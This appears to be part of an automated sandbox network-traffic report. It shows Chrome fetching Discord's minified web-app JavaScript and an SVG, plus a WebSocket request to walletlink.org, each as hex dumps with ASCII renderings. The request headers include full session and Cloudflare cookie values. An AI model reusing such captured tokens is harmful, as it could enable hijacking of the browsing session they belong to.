                                                                          2023-12-10 16:45:24 UTC1369INData Raw: 6c 74 5d 2c 65 3d 3e 7b 6c 65 74 7b 67 69 66 74 43 6f 64 65 3a 74 7d 3d 65 2c 6e 3d 68 2e 64 65 66 61 75 6c 74 2e 67 65 74 28 74 2e 73 6b 75 49 64 29 2c 7b 73 75 62 73 63 72 69 70 74 69 6f 6e 50 6c 61 6e 49 64 3a 73 7d 3d 74 2c 61 3d 6e 75 6c 6c 21 3d 73 3f 28 30 2c 67 2e 67 65 74 4f 72 46 65 74 63 68 53 75 62 73 63 72 69 70 74 69 6f 6e 50 6c 61 6e 29 28 73 29 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 7b 73 6b 75 3a 6e 2c 73 75 62 73 63 72 69 70 74 69 6f 6e 50 6c 61 6e 3a 61 2c 61 70 70 6c 69 63 61 74 69 6f 6e 3a 75 2e 64 65 66 61 75 6c 74 2e 67 65 74 41 70 70 6c 69 63 61 74 69 6f 6e 28 6e 2e 61 70 70 6c 69 63 61 74 69 6f 6e 49 64 29 2c 67 69 66 74 65 72 3a 45 2e 64 65 66 61 75 6c 74 2e 67 65 74 55 73 65 72 28 74 2e 75 73 65 72 49 64 29 7d 7d 29 28 65 3d 3e 7b
                                                                          Data Ascii: lt],e=>{let{giftCode:t}=e,n=h.default.get(t.skuId),{subscriptionPlanId:s}=t,a=null!=s?(0,g.getOrFetchSubscriptionPlan)(s):null;return{sku:n,subscriptionPlan:a,application:u.default.getApplication(n.applicationId),gifter:E.default.getUser(t.userId)}})(e=>{
                                                                          2023-12-10 16:45:24 UTC1369INData Raw: 65 3a 5f 2e 64 65 66 61 75 6c 74 2e 53 69 7a 65 73 2e 4d 45 44 49 55 4d 2c 63 6c 61 73 73 4e 61 6d 65 3a 52 2e 61 70 70 6c 69 63 61 74 69 6f 6e 49 63 6f 6e 2c 67 61 6d 65 3a 75 2c 73 6b 75 49 64 3a 69 2e 69 64 7d 29 2c 68 5d 7d 29 5d 7d 29 5d 7d 29 7d 29 7d 2c 32 39 31 38 35 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 4c 6f 67 69 6e 53 70 69 6e 6e 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 57 7d 2c 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4b 7d 7d 29 3b 76 61 72 20 73 3d 6e 28 22 33 37 39 38 33 22 29 2c 61 3d 6e 28 22 38 38 34 36 39 31 22 29 2c 6c 3d 6e 28 22 34 31 34 34 35 36 22 29 2c 72 3d 6e 2e 6e 28 6c 29
                                                                          Data Ascii: e:_.default.Sizes.MEDIUM,className:R.applicationIcon,game:u,skuId:i.id}),h]})]})]})})},291850:function(e,t,n){"use strict";n.r(t),n.d(t,{LoginSpinner:function(){return W},default:function(){return K}});var s=n("37983"),a=n("884691"),l=n("414456"),r=n.n(l)
                                                                          2023-12-10 16:45:24 UTC1369INData Raw: 61 74 69 6f 6e 4d 65 74 61 64 61 74 61 28 29 2c 28 30 2c 43 2e 74 72 61 63 6b 41 70 70 55 49 56 69 65 77 65 64 29 28 22 6c 6f 67 69 6e 22 29 7d 63 6f 6d 70 6f 6e 65 6e 74 44 69 64 55 70 64 61 74 65 28 65 29 7b 6c 65 74 7b 61 75 74 68 65 6e 74 69 63 61 74 65 64 3a 74 2c 6c 6f 63 61 74 69 6f 6e 3a 6e 7d 3d 74 68 69 73 2e 70 72 6f 70 73 2c 7b 63 68 65 63 6b 69 6e 67 48 61 6e 64 6f 66 66 3a 73 7d 3d 74 68 69 73 2e 73 74 61 74 65 3b 69 66 28 74 26 26 21 65 2e 61 75 74 68 65 6e 74 69 63 61 74 65 64 26 26 21 73 26 26 74 68 69 73 2e 6c 6f 67 69 6e 4f 72 53 53 4f 28 74 2c 6e 29 2c 65 2e 65 72 72 6f 72 73 21 3d 3d 74 68 69 73 2e 70 72 6f 70 73 2e 65 72 72 6f 72 73 29 7b 76 61 72 20 61 2c 6c 2c 72 3b 74 68 69 73 2e 68 61 73 45 72 72 6f 72 28 22 70 61 73 73 77 6f 72
                                                                          Data Ascii: ationMetadata(),(0,C.trackAppUIViewed)("login")}componentDidUpdate(e){let{authenticated:t,location:n}=this.props,{checkingHandoff:s}=this.state;if(t&&!e.authenticated&&!s&&this.loginOrSSO(t,n),e.errors!==this.props.errors){var a,l,r;this.hasError("passwor
                                                                          2023-12-10 16:45:24 UTC1369INData Raw: 66 28 6e 75 6c 6c 3d 3d 61 2e 73 65 72 76 69 63 65 29 74 28 42 2e 52 6f 75 74 65 73 2e 41 50 50 29 3b 65 6c 73 65 7b 6c 65 74 20 65 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 77 69 6e 64 6f 77 2e 47 4c 4f 42 41 4c 5f 45 4e 56 2e 41 50 49 5f 45 4e 44 50 4f 49 4e 54 2b 42 2e 45 6e 64 70 6f 69 6e 74 73 2e 53 53 4f 2c 74 3d 7b 2e 2e 2e 61 2c 74 6f 6b 65 6e 3a 4c 2e 64 65 66 61 75 6c 74 2e 67 65 74 54 6f 6b 65 6e 28 29 7d 3b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 3d 22 22 2e 63 6f 6e 63 61 74 28 65 2c 22 3f 22 29 2e 63 6f 6e 63 61 74 28 28 30 2c 69 2e 73 74 72 69 6e 67 69 66 79 29 28 74 29 29 7d 7d 68 61 73 45 72 72 6f 72 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 68 69 73 2e 70 72 6f 70 73 2e 65 72 72 6f 72
                                                                          Data Ascii: f(null==a.service)t(B.Routes.APP);else{let e=window.location.protocol+window.GLOBAL_ENV.API_ENDPOINT+B.Endpoints.SSO,t={...a,token:L.default.getToken()};window.location="".concat(e,"?").concat((0,i.stringify)(t))}}hasError(e){return null!=this.props.error


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          360192.168.2.550096162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:23 UTC975OUTGET /assets/e4c0cffdca343bc93615.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=7gQkpm8Wrg7CGgLYMJA0VTWrMBLEHt4_9y7yWstYA8M-1702226723349-0-604800000
                                                                          2023-12-10 16:45:24 UTC968INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 30 37 30 32 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 31 37 66 61 64 37 34 34 61 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:24 GMTContent-Type: application/javascriptContent-Length: 107021Connection: closeCF-Ray: 8336f5417fad744a-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.c
                                                                          2023-12-10 16:45:24 UTC401INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 33 30 33 37 22 5d 2c 7b 37 31 37 38 33 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 65 3d 53 74 72 69 6e 67 28 65 7c 7c 22 22 29 2c 6c 2e 74 65 73 74 28 65 29 29 3f 22 72 74 6c 22 3a 69 2e 74 65 73 74 28 65 29 3f 22 6c 74 72 22 3a 22 6e 65 75 74 72 61 6c 22 7d 3b 76 61 72 20 73 3d 22 d6 91 2d df bf ef ac 9d 2d ef b7 bd ef b9 b0 2d ef bb bc 22 2c 61 3d 22 41 2d 5a 61 2d 7a 5c 78 63 30 2d 5c 78 64 36 5c 78 64 38
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["3037"],{717837:function(e,t,n){"use strict";e.exports=function(e){return(e=String(e||""),l.test(e))?"rtl":i.test(e)?"ltr":"neutral"};var s="---",a="A-Za-z\xc0-\xd6\xd8
                                                                          2023-12-10 16:45:24 UTC1369INData Raw: 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 64 31 30 30 30 39 63 36 32 36 61 32 66 66 31 64 34 62 39 30 2e 73 76 67 22 7d 2c 33 37 39 32 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 38 37 35 34 61 63 39 32 36 62 39 66 62 33 38 66 35 36 61 38 2e 73 76 67 22 7d 2c 32 38 36 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 38 65 35 35 66 66 30 65 64 33 66 36 65 34 66 61 35 32 30 30 2e 73 76 67 22 7d 2c 35 30 31 38 35 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 33 66 39 37 37 65 30 65
                                                                          Data Ascii: ;e.exports=n.p+"d10009c626a2ff1d4b90.svg"},37920:function(e,t,n){"use strict";e.exports=n.p+"8754ac926b9fb38f56a8.svg"},2862:function(e,t,n){"use strict";e.exports=n.p+"8e55ff0ed3f6e4fa5200.svg"},501851:function(e,t,n){"use strict";e.exports=n.p+"3f977e0e
                                                                          2023-12-10 16:45:24 UTC1369INData Raw: 70 65 72 74 69 65 73 3a 65 3d 3e 7b 76 61 72 20 74 3b 6c 65 74 20 6e 3d 21 31 2c 73 3d 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 74 3d 65 2e 62 6f 64 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 65 6d 61 69 6c 5f 64 6f 6d 61 69 6e 3b 69 66 28 6e 75 6c 6c 21 3d 73 29 7b 6c 65 74 20 65 3d 73 2e 73 70 6c 69 74 28 22 2e 22 29 3b 6e 3d 2d 31 21 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 22 65 64 75 22 29 7d 72 65 74 75 72 6e 28 30 2c 61 2e 65 78 61 63 74 29 28 7b 69 73 5f 65 64 75 5f 65 6d 61 69 6c 3a 6e 7d 29 7d 7d 7d 29 2c 61 73 79 6e 63 20 73 65 6e 64 56 65 72 69 66 69 63 61 74 69 6f 6e 45 6d 61 69 6c 28 65 2c 74 2c 6e 29 7b 6c 65 74 20 6c 3d 61 77 61 69 74 20 69 2e 64 65 66 61 75 6c 74 2e 70 6f 73 74 28 7b 75
                                                                          Data Ascii: perties:e=>{var t;let n=!1,s=null==e?void 0:null===(t=e.body)||void 0===t?void 0:t.email_domain;if(null!=s){let e=s.split(".");n=-1!==e.indexOf("edu")}return(0,a.exact)({is_edu_email:n})}}}),async sendVerificationEmail(e,t,n){let l=await i.default.post({u
                                                                          2023-12-10 16:45:24 UTC1369INData Raw: 52 45 22 2c 65 72 72 6f 72 73 3a 65 2e 62 6f 64 79 7d 29 2c 65 7d 7d 7d 7d 2c 35 34 39 38 36 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 6d 7d 7d 29 2c 6e 28 22 32 32 32 30 30 37 22 29 3b 76 61 72 20 73 3d 6e 28 22 33 37 39 38 33 22 29 2c 61 3d 6e 28 22 38 38 34 36 39 31 22 29 2c 6c 3d 6e 28 22 37 33 30 32 39 30 22 29 2c 69 3d 6e 28 22 37 35 39 38 34 33 22 29 2c 72 3d 6e 28 22 33 39 34 38 34 36 22 29 2c 75 3d 6e 28 22 34 34 36 36 37 34 22 29 2c 6f 3d 6e 28 22 39 31 33 31 34 34 22 29 2c 64 3d 6e 28 22 34 33 37 38 32 32 22 29 2c 63 3d 6e 28 22 35 36 39 32 37 32 22 29 2c 66 3d 6e 28 22 39
                                                                          Data Ascii: RE",errors:e.body}),e}}}},549869:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return em}}),n("222007");var s=n("37983"),a=n("884691"),l=n("730290"),i=n("759843"),r=n("394846"),u=n("446674"),o=n("913144"),d=n("437822"),c=n("569272"),f=n("9
                                                                          2023-12-10 16:45:24 UTC1369INData Raw: 61 75 6c 74 29 28 7a 2e 64 65 66 61 75 6c 74 29 3b 63 6c 61 73 73 20 65 4e 20 65 78 74 65 6e 64 73 20 61 2e 50 75 72 65 43 6f 6d 70 6f 6e 65 6e 74 7b 73 74 61 74 69 63 20 67 65 74 44 65 72 69 76 65 64 53 74 61 74 65 46 72 6f 6d 50 72 6f 70 73 28 65 2c 74 29 7b 76 61 72 20 6e 3b 6c 65 74 7b 69 6e 76 69 74 65 3a 73 2c 6c 6f 63 61 74 69 6f 6e 3a 61 7d 3d 65 2c 7b 62 61 63 6b 67 72 6f 75 6e 64 49 64 3a 69 7d 3d 74 2c 72 3d 28 30 2c 6c 2e 70 61 72 73 65 29 28 61 2e 73 65 61 72 63 68 29 2c 75 3d 6e 75 6c 6c 21 3d 3d 28 6e 3d 72 2e 72 65 64 69 72 65 63 74 5f 74 6f 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 6e 75 6c 6c 3b 28 6e 75 6c 6c 3d 3d 75 7c 7c 22 22 3d 3d 3d 75 7c 7c 21 28 30 2c 50 2e 69 73 53 61 66 65 52 65 64 69 72 65 63 74 29 28 75 29 7c 7c 75 2e
                                                                          Data Ascii: ault)(z.default);class eN extends a.PureComponent{static getDerivedStateFromProps(e,t){var n;let{invite:s,location:a}=e,{backgroundId:i}=t,r=(0,l.parse)(a.search),u=null!==(n=r.redirect_to)&&void 0!==n?n:null;(null==u||""===u||!(0,P.isSafeRedirect)(u)||u.
                                                                          2023-12-10 16:45:24 UTC1369INData Raw: 65 74 63 68 41 70 70 6c 69 63 61 74 69 6f 6e 53 70 6c 61 73 68 28 29 7b 6c 65 74 7b 69 6e 76 69 74 65 3a 65 7d 3d 74 68 69 73 2e 70 72 6f 70 73 3b 69 66 28 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 73 74 61 74 65 29 3d 3d 3d 71 2e 49 6e 76 69 74 65 53 74 61 74 65 73 2e 52 45 53 4f 4c 56 45 44 29 7b 6c 65 74 7b 74 61 72 67 65 74 5f 61 70 70 6c 69 63 61 74 69 6f 6e 3a 74 7d 3d 65 3b 6e 75 6c 6c 21 3d 74 26 26 28 30 2c 4c 2e 66 65 74 63 68 41 73 73 65 74 49 64 73 29 28 74 2e 69 64 2c 5b 22 65 6d 62 65 64 64 65 64 5f 73 70 6c 61 73 68 22 5d 29 2e 74 68 65 6e 28 65 3d 3e 7b 6c 65 74 5b 74 5d 3d 65 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 65 74 53 74 61 74 65 28 7b 62 61 63 6b 67 72 6f 75 6e 64 49 64 3a 74 7d 29 7d 29 7d 7d 72 65 73 6f 6c 76 65 49
                                                                          Data Ascii: etchApplicationSplash(){let{invite:e}=this.props;if((null==e?void 0:e.state)===q.InviteStates.RESOLVED){let{target_application:t}=e;null!=t&&(0,L.fetchAssetIds)(t.id,["embedded_splash"]).then(e=>{let[t]=e;return this.setState({backgroundId:t})})}}resolveI
                                                                          2023-12-10 16:45:24 UTC1369INData Raw: 2e 52 6f 75 74 65 73 2e 52 45 47 49 53 54 45 52 2c 72 65 6e 64 65 72 3a 65 3d 3e 51 2e 43 4f 4e 46 45 52 45 4e 43 45 5f 4d 4f 44 45 5f 45 4e 41 42 4c 45 44 3f 28 30 2c 73 2e 6a 73 78 29 28 65 74 2c 7b 2e 2e 2e 65 2c 72 65 64 69 72 65 63 74 54 6f 3a 74 2c 69 6e 76 69 74 65 4b 65 79 3a 6e 7d 29 3a 28 30 2c 73 2e 6a 73 78 29 28 65 6c 2c 7b 2e 2e 2e 65 2c 72 65 64 69 72 65 63 74 54 6f 3a 74 7d 29 7d 29 2c 28 30 2c 73 2e 6a 73 78 29 28 49 2e 64 65 66 61 75 6c 74 2c 7b 70 61 74 68 3a 71 2e 52 6f 75 74 65 73 2e 47 49 46 54 5f 43 4f 44 45 5f 4c 4f 47 49 4e 28 22 3a 67 69 66 74 43 6f 64 65 22 29 2c 72 65 6e 64 65 72 3a 65 3d 3e 28 30 2c 73 2e 6a 73 78 29 28 65 73 2c 7b 6c 6f 67 69 6e 3a 21 30 2c 2e 2e 2e 65 7d 29 7d 29 2c 28 30 2c 73 2e 6a 73 78 29 28 49 2e 64 65
                                                                          Data Ascii: .Routes.REGISTER,render:e=>Q.CONFERENCE_MODE_ENABLED?(0,s.jsx)(et,{...e,redirectTo:t,inviteKey:n}):(0,s.jsx)(el,{...e,redirectTo:t})}),(0,s.jsx)(I.default,{path:q.Routes.GIFT_CODE_LOGIN(":giftCode"),render:e=>(0,s.jsx)(es,{login:!0,...e})}),(0,s.jsx)(I.de
                                                                          2023-12-10 16:45:24 UTC1369INData Raw: 7d 29 2c 28 30 2c 73 2e 6a 73 78 29 28 49 2e 64 65 66 61 75 6c 74 2c 7b 70 61 74 68 3a 71 2e 52 6f 75 74 65 73 2e 44 49 53 41 42 4c 45 5f 45 4d 41 49 4c 5f 4e 4f 54 49 46 49 43 41 54 49 4f 4e 53 2c 72 65 6e 64 65 72 3a 65 3d 3e 28 30 2c 73 2e 6a 73 78 29 28 65 63 2c 7b 2e 2e 2e 65 7d 29 7d 29 2c 28 30 2c 73 2e 6a 73 78 29 28 49 2e 64 65 66 61 75 6c 74 2c 7b 70 61 74 68 3a 71 2e 52 6f 75 74 65 73 2e 44 49 53 41 42 4c 45 5f 53 45 52 56 45 52 5f 48 49 47 48 4c 49 47 48 54 5f 4e 4f 54 49 46 49 43 41 54 49 4f 4e 53 2c 72 65 6e 64 65 72 3a 65 3d 3e 28 30 2c 73 2e 6a 73 78 29 28 65 66 2c 7b 2e 2e 2e 65 7d 29 7d 29 2c 28 30 2c 73 2e 6a 73 78 29 28 49 2e 64 65 66 61 75 6c 74 2c 7b 70 61 74 68 3a 71 2e 52 6f 75 74 65 73 2e 41 55 54 48 4f 52 49 5a 45 5f 49 50 2c 72
                                                                          Data Ascii: }),(0,s.jsx)(I.default,{path:q.Routes.DISABLE_EMAIL_NOTIFICATIONS,render:e=>(0,s.jsx)(ec,{...e})}),(0,s.jsx)(I.default,{path:q.Routes.DISABLE_SERVER_HIGHLIGHT_NOTIFICATIONS,render:e=>(0,s.jsx)(ef,{...e})}),(0,s.jsx)(I.default,{path:q.Routes.AUTHORIZE_IP,r
                                                                          2023-12-10 16:45:24 UTC1369INData Raw: 4e 43 45 5f 4d 4f 44 45 5f 45 4e 41 42 4c 45 44 3f 51 2e 44 45 46 41 55 4c 54 5f 49 4e 56 49 54 45 5f 43 4f 44 45 3a 76 6f 69 64 20 30 2c 75 3d 6e 75 6c 6c 21 3d 69 3f 28 30 2c 67 2e 67 65 6e 65 72 61 74 65 49 6e 76 69 74 65 4b 65 79 46 72 6f 6d 55 72 6c 50 61 72 61 6d 73 29 28 69 2c 6c 2e 73 65 61 72 63 68 29 3a 72 2c 6f 3d 6e 75 6c 6c 3d 3d 61 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 6e 3d 61 2e 70 61 72 61 6d 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 67 69 66 74 43 6f 64 65 2c 64 3d 6e 75 6c 6c 3d 3d 61 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 73 3d 61 2e 70 61 72 61 6d 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 73 3f 76 6f 69 64 20 30 3a 73 2e 67 75 69 6c 64 54 65 6d 70 6c 61 74 65 43 6f 64 65 3b 72 65 74 75 72
                                                                          Data Ascii: NCE_MODE_ENABLED?Q.DEFAULT_INVITE_CODE:void 0,u=null!=i?(0,g.generateInviteKeyFromUrlParams)(i,l.search):r,o=null==a?void 0:null===(n=a.params)||void 0===n?void 0:n.giftCode,d=null==a?void 0:null===(s=a.params)||void 0===s?void 0:s.guildTemplateCode;retur


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          361192.168.2.550097162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:24 UTC1036OUTGET /assets/321a07cbc6f5919dbce9.svg HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=mk2WwAmSuizV15bk0ZcVVPcnJ3_HQ1ogBfDYXb3juE0-1702226723672-0-604800000
                                                                          2023-12-10 16:45:24 UTC956INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 33 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 32 36 63 66 32 36 37 65 37 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:24 GMTContent-Type: image/svg+xmlContent-Length: 139Connection: closeCF-Ray: 8336f5426cf267e7-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-Co
                                                                          2023-12-10 16:45:24 UTC139INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 68 65 69 67 68 74 3d 22 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 20 38 22 20 77 69 64 74 68 3d 22 38 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 22 20 63 79 3d 22 34 22 20 72 3d 22 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 2f 73 76 67 3e 0a
                                                                          Data Ascii: <svg fill="none" height="8" viewBox="0 0 8 8" width="8" xmlns="http://www.w3.org/2000/svg"><circle cx="4" cy="4" r="4" fill="#fff"/></svg>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          362192.168.2.550098104.18.37.84435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:24 UTC503OUTGET /rpc HTTP/1.1
                                                                          Host: www.walletlink.org
                                                                          Connection: Upgrade
                                                                          Pragma: no-cache
                                                                          Cache-Control: no-cache
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Upgrade: websocket
                                                                          Origin: https://boringsecurity.com
                                                                          Sec-WebSocket-Version: 13
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Sec-WebSocket-Key: sE1HzQYebrE7uILRd7wTnA==
                                                                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                          2023-12-10 16:45:24 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 63 2d 57 65 62 73 6f 63 6b 65 74 2d 56 65 72 73 69 6f 6e 3a 20 31 33 0d 0a 58 2d 43 6f 6e 74 65 6e
